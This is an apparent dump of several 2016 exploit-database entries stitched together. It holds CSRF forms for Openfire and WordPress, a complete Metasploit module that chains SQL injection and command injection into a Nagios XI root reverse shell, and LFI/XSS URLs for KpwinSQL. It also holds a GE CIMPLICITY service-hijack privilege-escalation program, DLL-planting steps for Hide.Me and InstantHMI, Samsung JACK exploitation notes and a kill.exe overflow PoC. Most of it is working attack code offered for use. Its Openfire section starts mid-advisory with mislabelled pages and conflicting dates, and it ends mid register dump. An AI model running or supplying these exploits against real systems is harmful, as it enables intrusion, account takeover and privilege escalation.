**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Through this attack, an attacker could drive a valid user to execute unwittingly a request to the OpenFire sever.
These vulnerabilities have already been found by hyp3rlinx, but had not been patched yet.
### Proof of Concept
#### *connection-settings-external-components.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-create.jsp" method="get" target="csrf-frame" >
<input type="text" name="name" value="Evil" >
<input type="text" name="email" value="evil@evil.f" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="create" value="Create+User" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-password.jsp" method="post" target="csrf-frame" >
<input type="text" name="username" value="victim" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="update" value="Update+Password" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Sensitive information disclosure in OpenFire Server <=3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-200
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
A sensitive information disclosure vulnerabilty is present in the page *system-email.jsp*. It allow's an authenticated user to retreive the md5 hash the password of an email account.
### Vulnerable code
The following HTML code is reveived by an authenticated user on the page system-email.jsp. The md5 hash of the password is sent to the user.
```
<tr>
<td nowrap>
Server Username (Optional):
</td>
<td nowrap>
<input type="text" name="server_username" value="myusername" size="40" maxlength="150">
</td>
</tr>
<tr>
<td nowrap>
Server Password (Optional):
</td>
<td nowrap>
<input type="password" name="server_password" value="34819d7beeabb9260a5c854bc85b3e44" size="40" maxlength="150">
</td>
</tr>
```
### Affected versions
* Version >=3.10.2 and <4.0.2
### Fixes
* https://github.com/igniterealtime/Openfire/pull/570
### Solution
Update to version 4.0.2
### Timeline (dd/mm/yyyy)
* 15/10/2014 : Initial discovery
* 19/10/2015 : Contact with vendor team
* 27/11/2014 : vendor fixes vulnerabilities
* 27/11/2014 : vendor releases version 4.0.2, which includes the fixes
## Credits
* Florian Nivette <f.nivette@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios XI Chained Remote Code Execution',
'Description' => %q{
This module exploits an SQL injection, auth bypass, file upload,
command injection, and privilege escalation in Nagios XI <= 5.2.7
to pop a root shell.
},
'Author' => [
'Francesco Oddo', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['EDB', '39899']
],
'DisclosureDate' => 'Mar 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk'
}
},
'Targets' => [
['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'LHOST' => Rex::Socket.source_address
}
))
end
def check
res = send_request_cgi!(
'method' => 'GET',
'uri' => '/nagiosxi/'
)
return unless res && (html = res.get_html_document)
if (version = html.at('//input[@name = "version"]/@value'))
vprint_status("Nagios XI version: #{version}")
if Gem::Version.new(version) <= target[:version]
return CheckCode::Appears
end
end
CheckCode::Safe
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
end
print_status('Getting API token')
get_api_token
print_status('Getting admin cookie')
get_admin_cookie
print_status('Getting monitored host')
get_monitored_host
print_status('Downloading component')
download_profile_component
print_status('Uploading root shell')
upload_root_shell
print_status('Popping shell!')
pop_dat_shell
end
#
# Cleanup methods
#
def on_new_session(session)
super
print_status('Cleaning up...')
commands = [
'rm -rf ../profile',
'unzip -qd .. ../../../../tmp/component-profile.zip',
'chown -R nagios:nagios ../profile',
"rm -f ../../../../tmp/component-#{zip_filename}"
]
commands.each do |command|
vprint_status(command)
session.shell_command_token(command)
end
end
#
# Exploit methods
#
def get_api_token
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php',
'vars_get' => {
'mode' => 'resolve',
'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
'SELECT backend_ticket FROM xi_users WHERE user_id=1' \
'),FLOOR(RAND(0)*2))x ' \
'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
}
)
if res && res.body =~ /Duplicate entry '(.*?).'/
@api_token = $1
vprint_good("API token: #{@api_token}")
else
fail_with(Failure::UnexpectedReply, 'API token not found! punt!')
end
end
def get_admin_cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/rr.php',
'vars_get' => {
'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" +
Digest::MD5.hexdigest(@api_token)
}
)
if res && (@admin_cookie = res.get_cookies.split('; ').last)
vprint_good("Admin cookie: #{@admin_cookie}")
get_csrf_token(res.body)
else
fail_with(Failure::NoAccess, 'Admin cookie not found! punt!')
end
end
def get_csrf_token(body)
if body =~ /nsp_str = "(.*?)"/
@csrf_token = $1
vprint_good("CSRF token: #{@csrf_token}")
else
fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!')
end
end
def get_monitored_host
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/ajaxhelper.php',
'cookie' => @admin_cookie,
'vars_get' => {
'cmd' => 'getxicoreajax',
'opts' => '{"func":"get_hoststatus_table"}',
'nsp' => @csrf_token
}
)
return unless res && (html = res.get_html_document)
if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()'))
vprint_good("Monitored host: #{@monitored_host}")
else
fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!')
end
end
def download_profile_component
res = send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'vars_get' => {
'download' => 'profile'
}
)
if res && res.body =~ /^PK\x03\x04/
@profile_component = res.body
else
fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!')
end
end
def upload_root_shell
mime = Rex::MIME::Message.new
mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"')
mime.add_part('1', nil, nil, 'form-data; name="upload"')
mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
mime.add_part(payload_zip, 'application/zip', 'binary',
'form-data; name="uploadedfile"; ' \
"filename=\"#{zip_filename}\"")
res = send_request_cgi!(
'method' => 'POST',
'uri' => '/nagiosxi/admin/components.php',
'cookie' => @admin_cookie,
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
if res && res.code != 200
if res.redirect? && res.redirection.path == '/nagiosxi/install.php'
vprint_warning('Nagios XI not configured')
else
fail_with(Failure::PayloadFailed, 'Failed to upload root shell! punt!')
end
end
end
def pop_dat_shell
send_request_cgi(
'method' => 'GET',
'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',
'cookie' => @admin_cookie,
'vars_get' => {
'host' => @monitored_host,
'end' => ';sudo ../profile/getprofile.sh #'
}
)
end
#
# Support methods
#
def payload_zip
zip = Rex::Zip::Archive.new
Zip::File.open_buffer(@profile_component) do |z|
z.each do |f|
zip.entries << Rex::Zip::Entry.new(
f.name,
(if f.ftype == :file
if f.name == 'profile/getprofile.sh'
payload.encoded
else
z.read(f)
end
else
''
end),
Rex::Zip::CM_DEFLATE,
nil,
(Rex::Zip::EFA_ISDIR if f.ftype == :directory)
)
end
end
zip.pack
end
#
# Utility methods
#
def zip_filename
@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
end
end
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=796
https://bugs.chromium.org/p/project-zero/issues/detail?id=795
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The shared memory implementation (implemented by com.samsung.android.IAndroidShm
system service) allows any application to access/modify/map shared memory pages
used by JACK, regardless of which application created those shared memory pages.
(NB: This possibly results in breaking the Android permissions model and
permitting applications without the required capability to access microphone
input; this was not investigated further.)
There are multiple possible ways to corrupt the internal state of any of the
shared-memory backed c++ objects in use; attached is a PoC that uses the shared
memory service to map the JackEngineControl object in use, and modify the value
of the fDriverNum member, which is used in several places without validation.
This is highly likely not the only variable stored in shared memory that is used
without proper validation; and the function shown below is definitely not the
only place that this particular variable is used dangerously. To secure this
interface it will be necessary to review all uses of variables stored in these
shared memory interfaces.
/*!
\brief Engine control in shared memory.
*/
PRE_PACKED_STRUCTURE
struct SERVER_EXPORT JackEngineControl : public JackShmMem
{
// Shared state
jack_nframes_t fBufferSize;
jack_nframes_t fSampleRate;
bool fSyncMode;
bool fTemporary;
jack_time_t fPeriodUsecs;
jack_time_t fTimeOutUsecs;
float fMaxDelayedUsecs;
float fXrunDelayedUsecs;
bool fTimeOut;
bool fRealTime;
bool fSavedRealTime; // RT state saved and restored during Freewheel mode
int fServerPriority;
int fClientPriority;
int fMaxClientPriority;
char fServerName[JACK_SERVER_NAME_SIZE+1];
JackTransportEngine fTransport;
jack_timer_type_t fClockSource;
int fDriverNum;
bool fVerbose;
// CPU Load
jack_time_t fPrevCycleTime;
jack_time_t fCurCycleTime;
jack_time_t fSpareUsecs;
jack_time_t fMaxUsecs;
jack_time_t fRollingClientUsecs[JACK_ENGINE_ROLLING_COUNT];
unsigned int fRollingClientUsecsCnt;
int fRollingClientUsecsIndex;
int fRollingInterval;
float fCPULoad;
// For OSX thread
UInt64 fPeriod;
UInt64 fComputation;
UInt64 fConstraint;
// Timer
JackFrameTimer fFrameTimer;
#ifdef JACK_MONITOR
JackEngineProfiling fProfiler;
#endif
...
This is quite a convenient exploitation primitive, as a small negative value
will cause the code in several places to index backwards from a known array;
when (any of the similar functions to the below are called, table is pointing
to the fClientTable array inside a JackEngine instance)
void JackTransportEngine::MakeAllLocating(JackClientInterface** table)
{
for (int i = GetEngineControl()->fDriverNum; i < CLIENT_NUM; i++) {
JackClientInterface* client = table[i];
if (client) {
JackClientControl* control = client->GetClientControl();
control->fTransportState = JackTransportStopped;
control->fTransportSync = true;
control->fTransportTimebase = true;
jack_log("MakeAllLocating ref = %ld", i);
}
}
}
class SERVER_EXPORT JackEngine : public JackLockAble
{
friend class JackLockedEngine;
private:
JackGraphManager* fGraphManager;
JackEngineControl* fEngineControl;
char fSelfConnectMode;
JackClientInterface* fClientTable[CLIENT_NUM];
We can see that just behind the fClientTable, we have two pointers to other
objects; a JackEngineControl and a JackGraphManager, both of which are backed by
shared memory. Since we are treating the pointer read from table as a c++ object
with a vtable pointer, this lets us trivially gain control of the flow of
execution.
Fatal signal 11 (SIGSEGV), code 1, fault addr 0x41414140 in tid 27197 (jackd)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/zeroltexx/zerolte:6.0.1/MMB29K/G925FXXU3DPAD:user/release-keys'
Revision: '10'
ABI: 'arm'
pid: 27181, tid: 27197, name: jackd >>> /system/bin/jackd <<<
AM write failed: Broken pipe
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414140
r0 f3f1a000 r1 f48c2010 r2 f48c2010 r3 41414141
r4 f3f1a000 r5 00000036 r6 f3dbf930 r7 00000078
r8 f72c8b9c r9 f6f1a308 sl f3d3f000 fp f719a991
ip f71d7a0c sp f3dbf7d8 lr f7196c43 pc 41414140 cpsr 800f0030
backtrace:
#00 pc 41414140 <unknown>
#01 pc 0003cc41 /system/lib/libjackserver.so (Jack::JackTransportEngine::MakeAllLocating(Jack::JackClientInterface**)+52)
#02 pc 0003cda1 /system/lib/libjackserver.so (Jack::JackTransportEngine::CycleEnd(Jack::JackClientInterface**, unsigned int, unsigned int)+228)
#03 pc 00048bd5 /system/lib/libjackserver.so
#04 pc 00049211 /system/lib/libjackserver.so (Jack::JackEngine::Process(unsigned long long, unsigned long long)+228)
#05 pc 000442fd /system/lib/libjackserver.so
#06 pc 00044f49 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSyncMaster()+40)
#07 pc 00044f0d /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessGraphSync()+20)
#08 pc 00044e87 /system/lib/libjackserver.so (Jack::JackAudioDriver::ProcessSync()+94)
#09 pc 00044bbf /system/lib/libjackserver.so (Jack::JackAudioDriver::Process()+22)
#10 pc 0004fff1 /system/lib/libjackserver.so (Jack::JackThreadedDriver::Process()+24)
#11 pc 0005051f /system/lib/libjackserver.so (Jack::JackThreadedDriver::Execute()+18)
#12 pc 00040a0f /system/lib/libjackserver.so (Jack::JackAndroidThread::ThreadHandler(void*)+126)
#13 pc 0003fc53 /system/lib/libc.so (__pthread_start(void*)+30)
#14 pc 0001a38b /system/lib/libc.so (__start_thread+6)
Tombstone written to: /data/tombstones/tombstone_05
################################################################################################################
The usermode audio subsystem for the "Samsung Android Professional Audio" is
based on JACK, which appears to be designed for single-user usage. The common
JACK configuration on Linux systems appears to be a JACK server running under
the current user account, and interacting with JACK clients from the same user
account; so with a minimal privilege difference; this is not the case with the
configuration on Android, where the JACK service runs as a more privileged user
in a less restrictive SELinux domain to the clients that can connect to it.
The JACK shared memory implementation uses the struct jack_shm_info_t defined in
/common/shm.h to do some bookkeeping
PRE_PACKED_STRUCTURE
struct _jack_shm_info {
jack_shm_registry_index_t index; /* offset into the registry */
uint32_t size;
#ifdef __ANDROID__
jack_shm_fd_t fd;
#endif
union {
void *attached_at; /* address where attached */
char ptr_size[8];
} ptr; /* a "pointer" that has the same 8 bytes size when compling in 32 or 64 bits */
} POST_PACKED_STRUCTURE;
typedef struct _jack_shm_info jack_shm_info_t;
This struct is stored at the start of every JackShmAble object.
/*!
\brief
A class which objects possibly want to be allocated in shared memory derives from this class.
*/
class JackShmMemAble
{
protected:
jack_shm_info_t fInfo;
public:
void Init();
int GetShmIndex()
{
return fInfo.index;
}
char* GetShmAddress()
{
return (char*)fInfo.ptr.attached_at;
}
void LockMemory()
{
LockMemoryImp(this, fInfo.size);
}
void UnlockMemory()
{
UnlockMemoryImp(this, fInfo.size);
}
};
This means that whenever the JACK server creates an object backed by shared
memory, it also stores a pointer to that object (in the address space of the
JACK server), allowing a malicious client to bypass ASLR in the JACK server
process.
The PoC provided for the other reported JACK issue uses this to bypass ASLR in
the JACK server process.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40066.zip
OPAC KpwinSQL LFI/XSS Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Website : http://www.kpsys.cz/
Affected version: All
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Description:
KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
+ index.php
+ help.php
+ logpin.php
+ brow.php
+ indexs.php
+ search.php
+ hledani.php
+ hled_hesl.php
before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tested on: Apache/2.2.11 (Win32)
PHP/5.2.9-2
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Vulnerabilities discovered by Yakir Wizman
https://www.linkedin.com/in/yakirwizman
Date: 06.07.2016
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Proof Of Concept:
Local File Inclusion example:
http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
Cross Site Scripting example:
http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze
/*
# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
# Vulnerability Discovery and Exploit Author: Zhou Yu
# Email: <504137480@qq.com>
# Version: 8.2
# Tested on: Windows 7 SP1 X32
# CVE : None
Vulnerability Description:
SERVICE_CHANGE_CONFIG Privilege Escalation
C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
CimProxy
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
SERVICE_ALL_ACCESS
C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
[SC] QueryServiceConfig �ɹ�
SERVICE_NAME: CimProxy
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
Proxy.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CIMPLICITY Proxy Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Usage:
Put evil.exe and the exploit in the same folder and then run the exploit.
*/
#include <windows.h>
#include <stdio.h>
#include <string.h>
void main()
{
char szPath[MAX_PATH];
char *t;
GetModuleFileName(NULL,szPath,MAX_PATH);
t = strrchr(szPath, 0x5C);
t[0] = '\\';
t[1] = '\0';
strcat(szPath,"evil.exe\"");
char t1[] = "\"cmd.exe /c ";
char payload[] = "sc config CimProxy binPath= ";
strcat(t1,szPath);
strcat(payload,t1);
system(payload);
//stop service
printf("stop service!\n");
system("net stop CimProxy");
//start service
printf("start service!\n");
system("net start CimProxy");
}
Title: Hide.Me VPN Client - EoP: User to SYSTEM
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: eVenture
Product: Hide.Me VPN Client
Version: 1.2.4
Download link: https://hide.me/en/software/windows
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: Hide.me-Setup-1.2.4.exe
MD5: e5e5e2fa2c9592660a180357c4482740
SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034
- 1. Introduction: -
The installer automatically creates a folder named "hide.me VPN" under
c:\program files\ for the software.
No other location can be specified during installation.
The folder has insecure permissions allowing EVERYONE the WRITE permission.
Users can replace binaries or plant malicious DLLs to obtain elevated privileges.
As the software is running one executable as service under SYSTEM
permissions an attacker could elevate from regular user to SYSTEM.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt to specify an installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C. A user can overwrite an executable or drop a malicious DLL to obtain code execution.
The highest permissions are reached by overwriting the service executable: vpnsvc.exe
However it is running at startup and can't be stopped by a non-privileged user.
As we can write to the directory we can rename all of the DLL's to DLL.old
C:\Program Files\hide.me VPN\Common.dll
C:\Program Files\hide.me VPN\SharpRaven.dll
C:\Program Files\hide.me VPN\ComLib.dll
C:\Program Files\hide.me VPN\vpnlib.dll
C:\Program Files\hide.me VPN\Newtonsoft.Json.dll
C:\Program Files\hide.me VPN\DotRas.dll
Once renamed, reboot the machine, log on as normal user.
E. Observe both application AND the system service have crashed.
Now replace vpnsvc.exe with a malicious copy.
Place back all original DLLS and reboot.
Our code will get executed under elevated permissions: SYSTEM.
- 3. Mitigation: -
A. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman
######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is
<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
Title: InstantHMI - EoP: User to ADMIN
CWE Class: CWE-276: Incorrect Default Permissions
Date: 01/06/2016
Vendor: Software Horizons
Product: InstantHMI
Version: 6.1
Download link: http://www.instanthmi.com/ihmisoftware.htm
Tested on: Windows 7 x86, fully patched
Release mode: no bugbounty program, public release
Installer Name: IHMI61-PCInstall-Unicode.exe
MD5: ee3ca3181c51387d89de19e89aea0b31
SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f
- 1. Introduction: -
During a standard installation (default option) the installer
automatically creates a folder named "IHMI-6" in the root drive.
No other location can be specified during standard installation.
As this folder receives default permissions AUTHENTICATED USERS
are given the WRITE permission.
Because of this they can replace binaries or plant malicious
DLLs to obtain elevated, administrative level, privileges.
- 2. Technical Details/PoC: -
A. Obtain and execute the installer.
B. Observe there is no prompt for the installation location.
C. Review permissions under the Explorer Security tab or run icacls.exe
Example:
IHMI-6 BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
D. Change the main executable: InstantHMI.exe with a malicious copy.
E. Once executed by an administrator our code will run
under administrator level privileges.
- 3. Mitigation: -
A. Install under "c:\program files" or "C:\Program Files (x86)"
B. set appropriate permissions on the application folder.
- 4. Author: -
sh4d0wman
'''
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
=========================================
Microsoft Process Kill Utility "kill.exe"
File version: 6.3.9600.17298
The Kill tool (kill.exe), a tool used to terminate a process, part of the
WinDbg program.
Vulnerability Type:
===================
Buffer Overflow
SEH Buffer Overflow @ about 512 bytes
Vulnerability Details:
=====================
Register dump
'SEH chain of main thread
Address SE handler
001AF688 kernel32.756F489B
001AFBD8 52525252
42424242 *** CORRUPT ENTRY ***
001BF81C 41414141 AAAA
001BF820 41414141 AAAA
001BF824 41414141 AAAA
001BF828 41414141 AAAA
001BF82C 41414141 AAAA
001BF830 41414141 AAAA
001BF834 909006EB ë Pointer to next SEH record
001BF838 52525252 RRRR SE handler <================
001BF83C 90909090
001BF840 90909090
Exploit code(s):
================
Python POC.
'''
junk="A"*508+"RRRR"
pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
subprocess.Popen([pgm, junk], shell=False)
'''
Disclosure Timeline:
==================================
Vendor Notification: June 24, 2016
Vendor reply: Will not security service
July 8, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
'''
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
====================
WinDbg logviewer.exe
LogViewer (logviewer.exe), a tool that displays the logs created, part of
WinDbg application.
Vulnerability Type:
===================
Buffer Overflow DOS
Vulnerability Details:
=====================
Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv
files. App crash then Overwrite of MMX registers etc...
this utility belongs to Windows Kits/8.1/Debuggers/x86
Read Access Violation / Memory Corruption
Win32 API Log Viewer
6.3.9600.17298
Windbg x86
logviewer.exe
Log Viewer 3.01 for x86
(5fb8.32fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\syswow64\msvcrt.dll -
eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000
edi=013dcd30
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
msvcrt!memmove+0x1ee:
754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi]
ds:002b:005d2000=????????????????????????????????
gs 2b
fs 53
es 2b
ds 2b
edi 136cd30
esi 7d2000
ebx 7d0000
edx 0
ecx 41
eax 136ad30
ebp df750
eip 754fa048
cs 23
efl 210206
esp df748
ss 2b
dr0 0
dr1 0
dr2 0
dr3 0
dr6 0
dr7 0
di cd30
si 2000
bx 0
dx 0
cx 41
ax ad30
bp f750
ip a048
fl 206
sp f748
bl 0
dl 0
cl 41
al 30
bh 0
dh 0
ch 0
ah ad
fpcw 27f
fpsw 4020
fptw ffff
fopcode 0
fpip 76454c1e
fpipsel 23
fpdp 6aec2c
fpdpsel 2b
st0 -1.00000000000000e+000
st1 -1.00000000000000e+000
st2 -1.00000000000000e+000
st3 9.60000000000000e+001
st4 1.08506945252884e-004
st5 -1.00000000000000e+000
st6 0.00000000000000e+000
st7 0.00000000000000e+000
mm0 0:2:2:2
mm1 0:0:2:202
mm2 0:1:1:1
mm3 c000:0:0:0
mm4 e38e:3900:0:0
mm5 0:0:0:0
mm6 0:0:0:0
mm7 0:0:0:0
mxcsr 1fa0
xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
iopl 0
of 0
df 0
if 1
tf 0
sf 0
zf 0
af 0
pf 1
cf 0
vip 0
vif 0
xmm0l 4141:4141:4141:4141
xmm1l 4141:4141:4141:4141
xmm2l 4141:4141:4141:4141
xmm3l 4141:4141:4141:4141
xmm4l 4141:4141:4141:4141
xmm5l 4141:4141:4141:4141
xmm6l 4141:4141:4141:4141
xmm7l 4141:4141:4141:4141
xmm0h 4141:4141:4141:4141
xmm1h 4141:4141:4141:4141
xmm2h 4141:4141:4141:4141
xmm3h 4141:4141:4141:4141
xmm4h 4141:4141:4141:4141
xmm5h 4141:4141:4141:4141
xmm6h 4141:4141:4141:4141
xmm7h 4141:4141:4141:4141
xmm0/0 41414141
xmm0/1 41414141
xmm0/2 41414141
xmm0/3 41414141
xmm1/0 41414141
xmm1/1 41414141
xmm1/2 41414141
xmm1/3 41414141
xmm2/0 41414141
xmm2/1 41414141
xmm2/2 41414141
xmm2/3 41414141
xmm3/0 41414141
xmm3/1 41414141
xmm3/2 41414141
xmm3/3 41414141
xmm4/0 41414141
xmm4/1 41414141
xmm4/2 41414141
xmm4/3 41414141
